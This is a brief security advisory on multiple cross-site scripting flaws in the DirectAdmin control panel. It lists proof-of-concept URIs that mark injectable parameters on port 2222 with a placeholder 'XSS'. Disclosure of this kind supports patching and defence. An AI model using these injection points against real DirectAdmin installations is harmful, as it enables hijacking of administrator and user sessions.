DirectAdmin Multiple Cross-Site Scripting Vulnerabilities

DirectAdmin Multiple Cross-Site Scripting Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com:2222/CMD_SHOW_RESELLER?userXSS
http://www.example.com:2222/CMD_SHOW_USER?user=XSS
http://www.example.com:2222/CMD_TICKET_CREATE?TYPE=XSS
http://www.example.com:2222/CMD_EMAIL_FORWARDER_MODIFY?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_TICKET?action=view&number=000000044&type=XSS
http://www.example.com:2222/CMD_EMAIL_VACATION_MODIFY?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_EMAIL_LIST?action=view&DOMAIN=demo.com&name=XSS
http://www.example.com:2222/CMD_FTP_SHOW?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_SHOW_USER?user=XSS
http://www.example.com:2222/CMD_FILE_MANAGER/xss
http://www.example.com:2222/CMD_FILE_MANAGER/images=xss
http://www.example.com:2222/HTM_EMAIL_POP_MODIFY?DOMAIN=demo.com&USER=xss
http://www.example.com:2222/CMD_ADMIN_FILE_EDITOR?file=XSS